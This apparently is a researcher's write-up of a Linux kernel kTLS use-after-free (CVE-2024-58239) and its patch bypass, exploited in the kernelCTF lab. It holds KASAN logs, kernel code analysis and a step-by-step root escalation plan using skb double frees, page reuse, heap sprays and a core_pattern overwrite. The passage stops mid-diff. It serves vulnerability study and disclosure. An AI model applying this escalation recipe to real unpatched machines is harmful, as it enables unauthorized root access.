# CVE-2024-58239 1-day analysis
This is my first 1-day exploit.
Patch: [tls: stop recv() if initial process_rx_list gave us non-DATA](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=fdfbaec5923d9359698cbb286bc0deadbb717504)
I saw `exp407` on the [kernelCTF spreadsheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml#) and tried to reproduce the exploit.
I managed to run the exploit on the kernelCTF environment and got the flag.

The exploit log is kinda long because of a kernel WARNING in the middle. However, a warning is not an error, and it doesn't kill my exploit ;)

- Exploit for CVE-2024-58239: https://github.com/khoatran107/cve-2024-58239
- Exploit for the bypass, CVE-2025-39682: https://github.com/khoatran107/cve-2025-39682
## Vulnerability Overview
| Field | Value |
| ------------------ | --------------------------------------- |
| Product | Linux |
| Vendor | Linux |
| Severity | High |
| Affected Versions | From 5.1 to versions prior to 5.4.270, 5.10.211, 5.15.150, 6.1.80, 6.6.19, 6.7.7, 6.8 |
| Tested Versions | kernelCTF mitigation instance, 6.6.0+ |
| Impact | Elevation of Privilege |
| CVE ID | CVE-2024-58239 |
| CWE | CWE-416: Use After Free |
| PoC available? | Yes - the test in the patch commit |
| Patch available? | Yes |
| Exploit available? | Yes - my exploit |
## Notes on kTLS before exploiting
A few important notes for this exploit:
- kTLS is an upper layer protocol (ULP) on top of TCP, which essentially means one more "wrapping" layer on the transmit side and one more "unwrapping" layer on the receive side.
- On the receive side:
  - A TLS record, whether decrypted or not, is stored in a `struct sk_buff`.
  - `rx_list` contains records that are decrypted but not yet fully received (a record is pushed here when `recvmsg` is called with the `MSG_PEEK` option, or when the caller hasn't received the full record size).
  - `sk->sk_receive_queue` contains records that are not yet decrypted.
  - `anchor` is an skb allocated when TLS is set up; its `frag_list` pointer points to the first `skb` of the next TLS record in the receive queue.
## Vulnerability analysis
Patch:
```diff
diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
index 78aedfc682ba84..43dd0d82b6ed7a 100644
--- a/net/tls/tls_sw.c
+++ b/net/tls/tls_sw.c
@@ -1971,7 +1971,7 @@ int tls_sw_recvmsg(struct sock *sk,
goto end;
copied = err;
- if (len <= copied)
+ if (len <= copied || (copied && control != TLS_RECORD_TYPE_DATA))
goto end;
target = sock_rcvlowat(sk, flags & MSG_WAITALL, len);
```
The added condition makes `recvmsg` stop as soon as `copied != 0` and `control != TLS_RECORD_TYPE_DATA`.
So to trigger the bug on an unpatched kernel, we need to reach this check in exactly that state: some bytes already copied from `rx_list`, and a non-DATA record type.
```clike
err = process_rx_list(ctx, msg, &control, 0, len, is_peek);
if (err < 0)
goto end;
copied = err;
if (len <= copied) // patch here
goto end;
```
`err` is the length of the record just processed from `rx_list`, and `control` is the type of that record.
Record types are defined [here](https://elixir.bootlin.com/linux/v6.6/source/include/net/tls_prot.h#L16) as an enum, but throughout the code the kernel effectively treats them as two classes:
- DATA (= 23)
- non-DATA ~ control (!= 23)
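
The record type reaches userspace as a control message on `recvmsg`. Below is a minimal sketch of how a PoC can read it, based on the kernel TLS documentation. `recv_tls_record` is a hypothetical helper name (not taken from the exploit), and the two `#define` fallbacks mirror the values in the kernel UAPI headers so the sketch builds without them.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>

/* Fallbacks mirroring linux/socket.h and linux/tls.h, used only when the
 * system headers do not already provide them. */
#ifndef SOL_TLS
#define SOL_TLS 282
#endif
#ifndef TLS_GET_RECORD_TYPE
#define TLS_GET_RECORD_TYPE 2
#endif

/* Hypothetical helper: one recvmsg() on a kTLS socket.
 * Returns the number of bytes received, or -1 on error.
 * *type receives the record type, or stays 0 if no such cmsg was attached. */
static ssize_t recv_tls_record(int fd, void *buf, size_t len, int flags,
                               unsigned char *type)
{
    char cbuf[CMSG_SPACE(sizeof(unsigned char))];
    struct iovec iov = { .iov_base = buf, .iov_len = len };
    struct msghdr msg;
    struct cmsghdr *cmsg;
    ssize_t n;

    memset(&msg, 0, sizeof(msg));
    memset(cbuf, 0, sizeof(cbuf));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);

    *type = 0;
    n = recvmsg(fd, &msg, flags);
    if (n < 0)
        return -1;

    /* Look for the SOL_TLS / TLS_GET_RECORD_TYPE control message. */
    for (cmsg = CMSG_FIRSTHDR(&msg); cmsg; cmsg = CMSG_NXTHDR(&msg, cmsg)) {
        if (cmsg->cmsg_level == SOL_TLS &&
            cmsg->cmsg_type == TLS_GET_RECORD_TYPE)
            *type = *(unsigned char *)CMSG_DATA(cmsg);
    }
    return n;
}
```

Calling it with `MSG_PEEK` in `flags` corresponds to the "Peek packet" lines in the PoC output, and calling it with `flags = 0` to the "Recv packet" lines.
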
From [this patch](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/tls?id=62708b9452f8eb77513115b17c4f8d1a22ebf843) for `CVE-2025-39682`, I learned that a `recvmsg` syscall on a TLS socket should either:
* return one non-DATA record and stop;
* return merged content of DATA records next to each other.
The bug is that when `process_rx_list` returns a non-DATA record, `recvmsg` has to stop, but the vulnerable version continues processing the next record in the queue. (\*)
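
The difference between the vulnerable and the patched check can be modelled in user space. This is only a sketch of the single `if` touched by the patch, not kernel code; the function names are made up for illustration.

```c
#include <stdbool.h>
#include <stddef.h>

#define TLS_RECORD_TYPE_DATA 23

/* Vulnerable check after process_rx_list(): only the length matters,
 * so the record type is ignored. */
static bool stops_before_patch(size_t len, size_t copied, unsigned char control)
{
    (void)control;
    return len <= copied;
}

/* Patched check: also stop once a non-DATA record has been copied. */
static bool stops_after_patch(size_t len, size_t copied, unsigned char control)
{
    return len <= copied || (copied && control != TLS_RECORD_TYPE_DATA);
}
```

With `len = 0x200`, `copied = 0x100` and `control = 100` (a non-DATA record served from `rx_list` that did not fill the buffer), the first function says "keep going" and the second says "stop", which is exactly the state the PoC needs.
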
From the mailing list [messages](https://lore.kernel.org/all/018f1633d5471684c65def5fe390de3b15c3d683.1708007371.git.sd@queasysnail.net/), all I knew was that two consecutive non-DATA records get merged, and that there was a PoC for it.
It took me another week to fully calm down and think of it as (\*). I tried setting the record type of the second record to DATA and got this:

To pin down the root bug, I rebuilt the vulnerable version with KASAN and ran the PoC again:
```bash
user@lts-6:/tmp$ ./exploit
Server listening on port 8080...
Connected from 127.0.0.1:46588
Connected to server!
TLS enabled on connection!
Sent rec1: 1111
Server received: 1111 (record type: 100)
Server sent packet A: AAAA
Server sent packet B: BBBB
Peek packet A: AAAA (record type: 100)
00000000 | 41 41 41 41 00 | AAAA.
Recv packet A: AAAA (record type: 100)
00000000 | 41 41 41 41 00 | AAAA.
Recv packet B: 6�d� (record type: 23)
00000000 | 36 d5 15 64 cc | 6..d.
[ 22.388509] ==================================================================
[ 22.390887] BUG: KASAN: slab-use-after-free in tls_strp_done+0x57/0xc0
[ 22.393386] Read of size 8 at addr ffff88800b71ac00 by task exploit/180
[ 22.395760]
[ 22.396310] CPU: 1 PID: 180 Comm: exploit Not tainted 6.6.18+ #1
[ 22.398596] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 22.402651] Call Trace:
[ 22.403700] <TASK>
[ 22.404595] dump_stack_lvl+0x43/0x60
[ 22.406073] print_report+0xc5/0x660
[ 22.407520] ? preempt_count_add+0x1c/0xc0
[ 22.408585] ? preempt_count_sub+0x14/0xc0
[ 22.409573] ? __virt_addr_valid+0xef/0x190
[ 22.410021] kasan_report+0xc3/0x100
[ 22.410387] ? tls_strp_done+0x57/0xc0
[ 22.410813] ? tls_strp_done+0x57/0xc0
[ 22.411215] tls_strp_done+0x57/0xc0
[ 22.411575] tls_sk_proto_close+0x23a/0x4c0
[ 22.412040] ? __pfx_tls_sk_proto_close+0x10/0x10
[ 22.412590] ? preempt_count_sub+0x14/0xc0
[ 22.413038] ? down_write+0xd2/0x130
[ 22.413441] ? __pfx_down_write+0x10/0x10
[ 22.413872] inet_release+0xa5/0x110
[ 22.414257] __sock_release+0x63/0x120
[ 22.414835] sock_close+0x11/0x20
[ 22.415375] __fput+0x1d8/0x450
[ 22.415714] __x64_sys_close+0x51/0x90
[ 22.416118] do_syscall_64+0x61/0x90
[ 22.416538] ? exit_to_user_mode_prepare+0x1a/0x150
[ 22.417081] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[ 22.417589] RIP: 0033:0x422bd4
[ 22.417913] Code: 00 00 00 0f 1f 00 f3 0f 1e fa 31 c9 e9 15 67 04 00 0f 1f 44 00 00 f3 0f 1e fa 80 3d 8d 34 09 00 00 74 13 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 3c c3d
[ 22.419830] RSP: 002b:00007ffdd7cfd068 EFLAGS: 00000202 ORIG_RAX: 0000000000000003
[ 22.420754] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000422bd4
[ 22.421819] RDX: 0000000001ca0911 RSI: 0000000001ca0910 RDI: 0000000000000003
[ 22.422654] RBP: 00007ffdd7cfd0e0 R08: 00000000004b5820 R09: 0000000000000000
[ 22.423541] R10: 0000000000000001 R11: 0000000000000202 R12: 00007ffdd7cfd1f8
[ 22.424505] R13: 00007ffdd7cfd208 R14: 00000000004b0828 R15: 0000000000000001
[ 22.425417] </TASK>
[ 22.425742]
[ 22.426006] Allocated by task 180:
[ 22.426374] kasan_save_stack+0x2f/0x50
[ 22.426780] kasan_set_track+0x21/0x30
[ 22.427194] __kasan_slab_alloc+0x6a/0x70
[ 22.427598] kmem_cache_alloc_node+0x190/0x3c0
[ 22.428057] __alloc_skb+0x1b3/0x230
[ 22.428452] tls_strp_init+0x3b/0xb0
[ 22.428822] tls_set_sw_offload+0x805/0x920
[ 22.429325] tls_setsockopt+0x859/0x8c0
[ 22.429759] __sys_setsockopt+0x188/0x320
[ 22.430192] __x64_sys_setsockopt+0x60/0x70
[ 22.430619] do_syscall_64+0x61/0x90
[ 22.431051] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[ 22.431911]
[ 22.432099] Freed by task 180:
[ 22.432593] kasan_save_stack+0x2f/0x50
[ 22.433037] kasan_set_track+0x21/0x30
[ 22.433521] kasan_save_free_info+0x27/0x40
[ 22.433948] ____kasan_slab_free+0x11f/0x1a0
[ 22.434480] kmem_cache_free+0x185/0x390
[ 22.434891] process_rx_list+0x2be/0x310
[ 22.435430] tls_sw_recvmsg+0x313/0xd30
[ 22.435860] inet_recvmsg+0x22f/0x240
[ 22.436245] sock_recvmsg+0xff/0x140
[ 22.436655] ____sys_recvmsg+0x142/0x370
[ 22.437079] ___sys_recvmsg+0xe8/0x160
[ 22.437510] __sys_recvmsg+0xe7/0x170
[ 22.437905] do_syscall_64+0x61/0x90
[ 22.438272] entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[ 22.438857]
[ 22.439121] The buggy address belongs to the object at ffff88800b71ab40
[ 22.439121] which belongs to the cache skbuff_head_cache of size 224
[ 22.440870] The buggy address is located 192 bytes inside of
[ 22.440870] freed 224-byte region [ffff88800b71ab40, ffff88800b71ac20)
```
Great, a UAF, with a detailed KASAN report showing where the object was allocated and where it was freed.
## KASAN report analysis
### UAF Read at offset 192
* From `tls_strp_done`.
```c
// Call chain: tls_strp_done() -> tls_strp_anchor_free()
struct skb_shared_info *shinfo = skb_shinfo(strp->anchor);
// skb_shinfo() reads anchor->head, which sits at offset 192

#define skb_shinfo(SKB)	((struct skb_shared_info *)(skb_end_pointer(SKB)))

#ifdef NET_SKBUFF_DATA_USES_OFFSET
static inline unsigned char *skb_end_pointer(const struct sk_buff *skb)
{
	return skb->head + skb->end;
}
#endif
```
* The field `sk_buff::head` is at offset 192:
```C
gef> p (*(struct sk_buff*)0).head
Cannot access memory at address 0xc0
gef> p/d 0xc0
$4 = 192
```
* So we can conclude that the object being used after free is a `struct sk_buff`.
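
The offset can also be cross-checked directly from the KASAN report. A small sketch of that arithmetic, with the addresses copied from the report above (the macro and function names are mine):

```c
#include <stdint.h>

/* Values copied from the KASAN report. */
#define OBJ_START  UINT64_C(0xffff88800b71ab40) /* start of the freed object   */
#define BAD_ACCESS UINT64_C(0xffff88800b71ac00) /* address of the 8-byte read  */
#define OBJ_SIZE   UINT64_C(224)                /* skbuff_head_cache object size */

/* Offset of the faulting read inside the freed object. */
static uint64_t access_offset(void)
{
    return BAD_ACCESS - OBJ_START;
}

/* One past the last byte of the freed object. */
static uint64_t object_end(void)
{
    return OBJ_START + OBJ_SIZE;
}
```

`access_offset()` evaluates to 192 (0xc0), matching both the "located 192 bytes inside" line and the gdb offset of `head`, and `object_end()` matches the upper bound of the freed region printed by KASAN.
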
### Allocate
* From the backtrace, I checked `tls_strp_init` (which initializes the stream parser):
```C
int tls_strp_init(struct tls_strparser *strp, struct sock *sk)
{
memset(strp, 0, sizeof(*strp));
strp->sk = sk;
strp->anchor = alloc_skb(0, GFP_KERNEL); // [*] here
if (!strp->anchor)
return -ENOMEM;
INIT_WORK(&strp->work, tls_strp_work);
return 0;
}
```
* The freed skb is the anchor object. It's allocated from a dedicated cache, `skbuff_head_cache` (as the KASAN report shows). So… I either have to do a cross-cache attack, or attack by allocating another skb. The first option is blocked because I am targeting the mitigation instance, which has `CONFIG_SLAB_VIRTUAL`.
### Deallocate
* It's freed by `consume_skb` inside `process_rx_list`. My question was: *how does the anchor even get in there?*
* I can confirm that it is in fact on `rx_list` during my second receive (when the BBBB packet is expected):
```C
gef> chain &ctx->rx_list
[+] head address: 0xffff888001a1b630
[+] next pointer offset: 0x0
[1] -> 0xffff88800b81b500
[2] -> 0xffff888001a1b630 (head)
gef> p ctx->strp->anchor
$6 = (struct sk_buff *) 0xffff88800b81b500
```
### How does the `anchor` get into `rx_list`?
* One hypothesis is that the skb `next` pointer of the `BBBB` skb points to `anchor`. But that is unlikely, since the first skb of a TLS record is only attached as the `frag_list` of the anchor:
```
skb_shinfo(strp->anchor)->frag_list = first;
```
* I think the magic lies in the first receive, so let's walk through what happens there.
```C
int tls_sw_recvmsg(struct sock *sk,
struct msghdr *msg,
size_t len,
int flags,
int *addr_len)
{
// [...]
err = process_rx_list(ctx, msg, &control, 0, len, is_peek); // returns AAAA - record type 100
// [...]
copied = err;
if (len <= copied) // the patch [2/5] makes it stop right here
goto end;
// [...]
while (/* ... */) {
// [...]
if (zc_capable /* true */ && to_decrypt <= len /* 0 <= 0x100, true */ &&
tlm->control == TLS_RECORD_TYPE_DATA /* true */)
darg.zc = true; // set zc = true
// [...]
err = tls_rx_one_record(sk, msg, &darg); // [1]
// [...]
err = tls_record_content_type(msg, tls_msg(darg.skb), &control); // [2]
if (err <= 0) { // err = 0
DEBUG_NET_WARN_ON_ONCE(darg.zc);
tls_rx_rec_done(ctx);
put_on_rx_list_err:
__skb_queue_tail(&ctx->rx_list, darg.skb); // [3] here darg.skb = ctx->strp->anchor
goto recv_end;
}
// [...]
}
// [...]
}
```
* After [1], we already have `darg.skb = ctx->strp->anchor`. That calls for another deep dive, this time into `tls_rx_one_record` with `zc` being true.
```C
static int tls_rx_one_record(struct sock *sk, struct msghdr *msg,
struct tls_decrypt_arg *darg)
{
// [...]
err = tls_decrypt_device(sk, msg, tls_ctx, darg);
if (!err) // always true
err = tls_decrypt_sw(sk, tls_ctx, msg, darg);
// [...]
}
static int
tls_decrypt_sw(struct sock *sk, struct tls_context *tls_ctx,
struct msghdr *msg, struct tls_decrypt_arg *darg)
{
// [...]
err = tls_decrypt_sg(sk, &msg->msg_iter, NULL, darg);
// [...]
}
static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
struct scatterlist *out_sg,
struct tls_decrypt_arg *darg)
{
// [...]
if (darg->zc /* true */ && (out_iov /* out_iov = &msg->msg_iter != NULL */ || out_sg)) {
clear_skb = NULL; // [4]
if (out_iov)
n_sgout = 1 + tail_pages +
iov_iter_npages_cap(out_iov, INT_MAX, data_len);
else
n_sgout = sg_nents(out_sg);
} else {
darg->zc = false;
clear_skb = tls_alloc_clrtxt_skb(sk, skb, rxm->full_len);
// [...]
}
// [...]
darg->skb = clear_skb /* NULL, from [4] */ ?: tls_strp_msg(ctx); // [5]
clear_skb = NULL;
// [...]
}
static inline struct sk_buff *tls_strp_msg(struct tls_sw_context_rx *ctx)
{
DEBUG_NET_WARN_ON_ONCE(!ctx->strp.msg_ready || !ctx->strp.anchor->len);
return ctx->strp.anchor; // [6]
}
```
* Because of [4], `darg->skb` is set to `ctx->strp.anchor` at [5] and [6]. And because at [2] the type of the current record (DATA) differs from that of the previous record (non-DATA), `darg->skb` is inserted into `rx_list` at [3].
* The `BBBB` record is not dropped; the return value just doesn't reflect the real length of the response. When I hexdump the whole buffer passed to the syscall, I get the output below. This means that with `zc` being true, the data is decrypted straight into the userspace buffer, and the record itself is never queued on `rx_list`:
```
Recv packet A (record type: 100)
00000000 | 41 41 41 41 00 42 42 42 42 00 | AAAA.BBBB. |
```
* It seems that `darg->skb` is always equal to the anchor when the record type is DATA. What makes the difference here is that `tls_record_content_type` returns 0 because the record type differs from the previous one.
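
The walk-through above can be condensed into a toy user-space model. Everything here is a simplification made up for illustration: `toy_ctx` has a one-slot `rx_list`, `toy_content_type` only keeps the "same type or not" part of `tls_record_content_type`, and `clear_skb` stands for the freshly allocated clear-text skb of the non-zero-copy path.

```c
#include <stdbool.h>
#include <stddef.h>

#define TLS_RECORD_TYPE_DATA 23

struct toy_skb { unsigned char control; };

struct toy_ctx {
    struct toy_skb *anchor;  /* stands in for ctx->strp.anchor     */
    struct toy_skb *rx_list; /* one-slot stand-in for ctx->rx_list */
};

/* Simplified tls_record_content_type(): 1 = same type, 0 = type changed. */
static int toy_content_type(unsigned char rec_type, unsigned char *control)
{
    if (!*control) {
        *control = rec_type;
        return 1;
    }
    return *control == rec_type ? 1 : 0;
}

/* Simplified loop body of tls_sw_recvmsg() for one record. */
static void toy_rx_one(struct toy_ctx *ctx, struct toy_skb *clear_skb,
                       unsigned char rec_type, bool zc, unsigned char *control)
{
    /* [5]: with zero-copy there is no clear_skb, so darg.skb is the anchor */
    struct toy_skb *darg_skb = zc ? ctx->anchor : clear_skb;

    darg_skb->control = rec_type;
    if (toy_content_type(rec_type, control) <= 0)
        ctx->rx_list = darg_skb; /* [3]: put_on_rx_list_err */
}
```

In this model, entering with `control = 100` (left over from `process_rx_list`) and then handling a DATA record with `zc = true` leaves `rx_list` pointing at the anchor. The ordinary mismatch case (a non-DATA record following DATA, `zc = false`) only queues the separately allocated clear-text skb.
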
## Exploit
### Brainstorm
Here's the original sequence of actions that triggers the bug:
1. server sends A * 100h (record type non-DATA)
2. server sends B * 100h (record type DATA)
3. client peeks 100h → A * 100h is in `rx_list`; `skb_shinfo(anchor)->frag_list` = head of packet B
4. client receives 200h → gets A * 100h and B * 100h; `anchor` is in `rx_list`. B is freed, but `skb_shinfo(anchor)->frag_list` still points to B.
5. client receives 200h → `anchor` gets freed but is still referenced by `ctx->strp.anchor`; some mysterious data is returned.
6. close the client fd → UAF read of the `anchor` object.

If we spray skb objects to reclaim the victim between (5) and (6), we may get something.

Since this is an `skb` double free, I assumed I could turn it into a page UAF: spray a bunch of skbs whose `frags[0]` is an order-0 page, free one through the UAF free, reclaim the page with a pipe spray, then free it again with my sprayer. At that point we have a page UAF. The last step is a `signalfd` spray to reclaim that order-0 page as a slab of the `filp` cache.
### Full process
1. Trigger the bug so that `anchor` is inside `rx_list` (while still referenced by `ctx->strp.anchor`); `skb_shinfo(anchor)->frag_list = skb B`, and `skb B` is already freed.
2. Spray to reclaim `skb B`.
3. Free both `anchor` and `skb B` through the `splice` syscall.
4. Reclaim `anchor` by spraying `skb`s of a specific size (0xec0 + 0x1000), which makes `skb_shinfo(anchor)->frags[0]` a victim page of order 0. Now `anchor` is referenced by both an `sk->sk_receive_queue` and `ctx->strp.anchor`, and `skb_shinfo(anchor)->frag_list = NULL`.
5. Release the anchor and the page through `sk->sk_receive_queue` with the `recv` syscall. This also frees the order-0 page back to the buddy allocator.
6. Reclaim that order-0 page with a pipe spray.
7. Release that page back to the buddy allocator again by freeing `anchor` through `ctx->strp.anchor`.
8. Reclaim that order-0 page as a slab of the `filp` cache.
9. Overwrite `core_pattern`.
10. Trigger a segfault -> ROOT.
## Side notes
### `skb` is sprayable
The `skb` object isn't completely wiped in `consume_skb()`: its `skb_shinfo(skb)->frags[]` is kept. So double freeing an `skb` object also double frees the `struct page *` it references, i.e. it double frees a page.
### Spray object
Through experimentation, I found that for an `AF_UNIX` stream packet of length X, the first `0xec0` bytes live in the linear area at `skb->head`. The remaining `Y = X - 0xec0` bytes are split into pages stored in `skb_shinfo(skb)->frags[]`, using as few pages as possible, with orders in `[0, PAGE_ALLOC_COSTLY_ORDER (3)]`.
If Y is smaller than `PAGE_SIZE << PAGE_ALLOC_COSTLY_ORDER` (0x8000), it's rounded up to the nearest page size. If not, an order-3 page is allocated, Y is reduced by `PAGE_SIZE << 3`, and the process repeats.
With that, I wrote an `SkbSprayer` object to spray skb objects with a configurable object count and data size.
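
To pick spray sizes, the splitting rule described above can be turned into a small calculator. This is a sketch under assumptions: the `0xec0` linear size is the value observed above, and the greedy "largest order that does not exceed the page-aligned remainder" rule is my reading of the description. The real kernel allocation path may differ in corner cases, so treat the output as an estimate.

```c
#include <stddef.h>

#define TOY_PAGE_SIZE    0x1000UL
#define TOY_COSTLY_ORDER 3
#define TOY_LINEAR_BYTES 0xec0UL /* linear part observed for AF_UNIX stream skbs */

/* Fill orders[] with the expected page order of each frag for a payload of
 * `total` bytes. Returns the number of frags written (at most `max`). */
static size_t frag_orders(size_t total, int *orders, size_t max)
{
    size_t rest = total > TOY_LINEAR_BYTES ? total - TOY_LINEAR_BYTES : 0;
    size_t n = 0;
    int order = TOY_COSTLY_ORDER;

    while (rest && n < max) {
        size_t aligned = (rest + TOY_PAGE_SIZE - 1) & ~(TOY_PAGE_SIZE - 1);
        size_t chunk;

        /* Lower the order until the chunk fits the page-aligned remainder. */
        while (order && aligned < (TOY_PAGE_SIZE << order))
            order--;

        chunk = TOY_PAGE_SIZE << order;
        orders[n++] = order;
        rest -= rest < chunk ? rest : chunk;
    }
    return n;
}
```

For the size used in the exploit, `0xec0 + 0x1000`, this yields a single order-0 frag, which is the page that later becomes the victim page.
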
### Double free
The SLUB allocator only panics on `free(x)` if x is currently the head of its slab's freelist. So we can spray multiple targets and free another object before freeing x the second time, which makes sure x is not the head of its slab's freelist, so there is no panic.
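
A toy model of that check makes the trick concrete. It is a deliberately simplified freelist, not SLUB itself, and all names are invented for the sketch.

```c
#include <stdbool.h>
#include <stddef.h>

struct toy_obj  { struct toy_obj *next_free; };
struct toy_slab { struct toy_obj *freelist; };

/* Returns false where the naive check would fire: the object being freed
 * is already the head of the freelist. Otherwise pushes it on the list. */
static bool toy_free(struct toy_slab *slab, struct toy_obj *obj)
{
    if (obj == slab->freelist)
        return false;
    obj->next_free = slab->freelist;
    slab->freelist = obj;
    return true;
}
```

Freeing `x` twice in a row is caught, but the sequence `free(x)`, `free(y)`, `free(x)` passes, leaving `x` on the freelist twice (`x -> y -> x`). That interleaving is what the spray provides in the exploit.
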
### Why `splice`?
* After the object is reclaimed by an `AF_UNIX` stream skb, its `next` and `prev` fields point to the `sk_receive_queue` field (a `struct sk_buff_head`) of `struct sock`, forming a cyclic linked list. A normal `tls_sw_recvmsg` doesn't unlink the skb from that queue, so `consume_skb` traverses the `next` pointer and frees an invalid pointer (`sock + 0xd8`). So I looked for places where `ctx->rx_list` is used, preferably together with `__skb_dequeue`, and found two:
  * `tls_sw_splice_read`
  * `tls_sw_read_sock`

I tried the first one and it has what I need:
```C
ssize_t tls_sw_splice_read(struct socket *sock, loff_t *ppos,
struct pipe_inode_info *pipe,
size_t len, unsigned int flags)
{
// [...]
if (!skb_queue_empty(&ctx->rx_list)) {
skb = __skb_dequeue(&ctx->rx_list); // skb->next & prev set to NULL
} else {
// [...]
}
rxm = strp_msg(skb);
tlm = tls_msg(skb);
if (tlm->control != TLS_RECORD_TYPE_DATA /* false */) {
err = -EINVAL;
goto splice_requeue;
}
chunk = min_t(unsigned int, rxm->full_len, len);
copied = skb_splice_bits(skb, sk, rxm->offset, pipe, chunk, flags);
if (copied < 0 /* false */)
goto splice_requeue;
if (chunk < rxm->full_len /* can set to false */) {
rxm->offset += len;
rxm->full_len -= len;
goto splice_requeue;
}
consume_skb(skb); // no more invalid free here.
```
With this path, the SLUB allocator no longer sees an invalid free.
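
The property I rely on is that dequeuing clears the link fields of the skb before it is consumed. A toy doubly linked queue showing that effect (a user-space sketch with invented names, where the queue head is modelled as a sentinel node):

```c
#include <stddef.h>

struct toy_skb { struct toy_skb *next, *prev; };

/* An empty queue is a sentinel that points to itself. */
static void toy_queue_init(struct toy_skb *head)
{
    head->next = head;
    head->prev = head;
}

static void toy_queue_tail(struct toy_skb *head, struct toy_skb *skb)
{
    skb->next = head;
    skb->prev = head->prev;
    head->prev->next = skb;
    head->prev = skb;
}

/* Unlink the first element and clear its links, mirroring the effect
 * noted in the comment next to __skb_dequeue() above. */
static struct toy_skb *toy_dequeue(struct toy_skb *head)
{
    struct toy_skb *skb = head->next;

    if (skb == head)
        return NULL; /* queue is empty */
    skb->prev->next = skb->next;
    skb->next->prev = skb->prev;
    skb->next = NULL;
    skb->prev = NULL;
    return skb;
}
```

After `toy_dequeue`, the returned element has `next == NULL` and `prev == NULL`, so whatever frees it afterwards has no stale neighbor pointer to follow.
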
### Pipe spray weird behavior
During my first n-day analysis, I learned that for pipe spraying, the kernel only allocates an order-0 page for the pipe when we call `write(0x1000)`.
However, while developing this exploit something weird happened: I do `write(0x1000)` and then `read(0x2000)`; the first 50 or so pipes return 0x2000, and the rest return 0x1000.
I would dig into this if I had more time. As a quick fix, I just assume the first page is allocated when creating the socket, and only care about the last page when spraying.
### Page UAF to ROOT
For this step I do the same as in the previous n-day: a `signalfd` spray. The difference is that I use the arbitrary write primitive to write straight into `core_pattern` instead of just overwriting `cred`.
### Weakness of this exploit
My exploit relies on two facts about the kernel:
- Freeing a `struct sk_buff` object doesn't clear its `frags` array.
- Double free detection in the SLUB allocator is naive: it only panics when the slot being freed is the **head** of its slab's freelist.

If either of those is fixed, the exploit dies.
## Success rate
I ran `calc_AC_rate.py` to test the exploit 100 times, and the result was `50/100`.
That can definitely be improved. In most of the failed attempts, I get this backtrace:
```
[ 4.050330] ? die+0x32/0x80
[ 4.050809] ? do_trap+0xd6/0x100
[ 4.051365] ? __slab_free+0x16c/0x380
[ 4.052198] ? do_error_trap+0x6a/0x90
[ 4.052767] ? __slab_free+0x16c/0x380
[ 4.053350] ? exc_invalid_op+0x4c/0x60
[ 4.053916] ? __slab_free+0x16c/0x380
[ 4.055031] ? asm_exc_invalid_op+0x16/0x20
[ 4.055675] ? tcp_rcv_state_process+0x791/0xef0
[ 4.056527] ? __slab_free+0x16c/0x380
[ 4.057097] ? lock_timer_base+0x61/0x80
[ 4.057795] ? tcp_get_metrics+0x142/0x380
[ 4.058560] ? tcp_rcv_state_process+0x791/0xef0
[ 4.059265] kmem_cache_free+0x599/0x5e0
[ 4.059915] tcp_rcv_state_process+0x791/0xef0
[ 4.060918] ? security_sock_rcv_skb+0x31/0x50
[ 4.061857] ? sk_filter_trim_cap+0x11a/0x290
[ 4.062558] tcp_v4_do_rcv+0xcd/0x280
[ 4.063281] tcp_v4_rcv+0xf81/0x1010
[ 4.063832] ? raw_local_deliver+0xcd/0x250
[ 4.064668] ip_protocol_deliver_rcu+0x32/0x320
[ 4.065355] ip_local_deliver_finish+0x7a/0xa0
[ 4.066455] ip_sublist_rcv_finish+0x7e/0x90
[ 4.067231] ip_sublist_rcv+0x1e1/0x220
[ 4.067919] ? __netif_receive_skb_core.constprop.0+0xbf/0x1080
[ 4.068822] ip_list_rcv+0x139/0x170
[ 4.069362] __netif_receive_skb_list_core+0x29d/0x2c0
[ 4.070173] ? __pfx_csum_block_add_ext+0x10/0x10
[ 4.071054] netif_receive_skb_list_internal+0x1e1/0x310
[ 4.072068] napi_complete_done+0x6e/0x1a0
[ 4.072752] virtnet_poll+0x40d/0x5a0
[ 4.073313] __napi_poll+0x28/0x1c0
[ 4.073854] net_rx_action+0x14c/0x2d0
[ 4.074622] ? vp_vring_interrupt+0x73/0x90
[ 4.075746] __do_softirq+0xf6/0x30f
[ 4.076379] __irq_exit_rcu+0x79/0xc0
[ 4.077356] common_interrupt+0xb9/0xd0
```
I think there must be a way, via `setsockopt` or something similar, to avoid that.
## Patch bypass
### CVE-2025-39682
Patch commit: [tls: fix handling of zero-length records on the rx_list](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/tls?id=62708b9452f8eb77513115b17c4f8d1a22ebf843)
Exploit code: https://github.com/khoatran107/cve-2025-39682

With a similar approach, I wrote an exploit for CVE-2025-39682.
Success rate: `79/100`. I developed this exploit later and changed it a little, so it's more stable.
Diff:
```diff
diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
index 51c98a007ddac4..bac65d0d4e3e1e 100644
--- a/net/tls/tls_sw.c
+++ b/net/tls/tls_sw.c
@@ -1808,6 +1808,9 @@ int decrypt_skb(struct sock *sk, struct scatterlist *sgout)
return tls_decrypt_sg(sk, NULL, sgout, &darg);
}
+/* All records returned from a recvmsg() call must have the same type.
+ * 0 is not a valid content type. Use it as "no type reported, yet".
+ */
static int tls_record_content_type(struct msghdr *msg, struct tls_msg *tlm,
u8 *control)
{
@@ -2051,8 +2054,10 @@ int tls_sw_recvmsg(struct sock *sk,
if (err < 0)
goto end;
